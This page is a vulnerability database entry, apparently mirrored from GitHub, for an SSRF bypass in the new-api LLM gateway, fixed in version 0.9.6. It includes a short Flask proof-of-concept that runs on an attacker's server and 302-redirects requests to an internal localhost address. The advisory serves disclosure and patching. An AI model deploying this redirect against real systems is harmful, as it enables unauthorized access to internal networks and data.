Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-9f46-w24h-69w4

Опубликовано: 24 нояб. 2025
Источник: github
Github: Прошло ревью
CVSS3: 8.5

Описание

new-api is vulnerable to SSRF Bypass

Summary

A recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur. Because the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet.

Details

Use the following script to deploy on the attacker's server. Since ports 80, 443, and 8080 are default ports within the security range set by the administrator and will not be blocked, the service is deployed on port 8080.

from flask import Flask, redirect app = Flask(__name__) @app.route('/redirect') def ssrf_redirect(): return redirect('http://127.0.0.1:8003/uid.txt', code=302) if __name__ == '__main__': app.run(host='0.0.0.0', port=8080)

Then, a request is made to the malicious service opened by the attacker, and it can be found that the resources on the intranet are successfully accessed. image At the same time, the locally opened service 127.0.0.1:8083/uid.txt also received related requests. image

Impact

Using 302 redirects to bypass previous SSRF security fixes

Пакеты

Наименование

github.com/QuantumNous/new-api

go
Затронутые версииВерсия исправления

< 0.9.6

0.9.6

EPSS

Процентиль: 13%
0.00042
Низкий

8.5 High

CVSS3

Дефекты

CWE-918

Связанные уязвимости

CVSS3: 8.5
nvd
2 месяца назад

New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.9.6, a recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur. Because the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet. This issue has been patched in version 0.9.6.

EPSS

Процентиль: 13%
0.00042
Низкий

8.5 High

CVSS3

Дефекты

CWE-918